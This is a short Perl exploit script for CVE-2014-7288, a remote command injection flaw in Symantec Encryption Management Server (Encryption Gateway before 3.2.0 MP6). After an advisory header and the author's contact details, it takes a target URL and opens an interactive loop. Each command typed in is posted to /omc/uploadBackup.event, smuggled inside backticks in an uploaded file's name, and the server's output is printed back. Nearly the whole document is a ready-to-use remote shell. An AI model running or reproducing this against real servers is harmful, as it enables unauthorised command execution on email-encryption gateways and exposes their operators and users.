#!/usr/bin/perl -w use LWP::UserAgent; # Vantage Point Security Advisory 2014-007 # Title: Symantec Encryption Management Server - Remote Command Injection Exploit # CVE: CVE-2014-7288 # Vendor: Symantec # Affected Product: Symantec Encryption Gateway # Affected Versions: < 3.2.0 MP6 # Product Website: http://www.symantec.com/en/sg/gateway-email-encryption/ # Exploit Info : https://www.exploit-db.com/exploits/35949/ # Author: Mohammad Reza Espargham # Linkedin : https://ir.linkedin.com/in/rezasp # E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com # Website : www.reza.es # Twitter : https://twitter.com/rezesp # FaceBook : https://www.facebook.com/mohammadreza.espargham if (($#ARGV + 1) != 1) { printf " Usage: \n \t$0 <Target>\n"; printf "\t$0 http://target.com/\n\n"; exit(1); } chomp($target=$ARGV[0]); if($target !~ /http:\/\//) { $target = "http://$target"; } my $ua = LWP::UserAgent->new; $ua->timeout(10); my $url = "$target/omc/uploadBackup.event"; for(;;) { print "shell : "; chomp($cmd=<STDIN>); my $response = $ua->post( $url, Content_Type => 'form-data', name => "file", Content => [ filename => "test123|`$cmd`|-whatever.tar.gz.pgp" ] ); print "\n".$response->content; }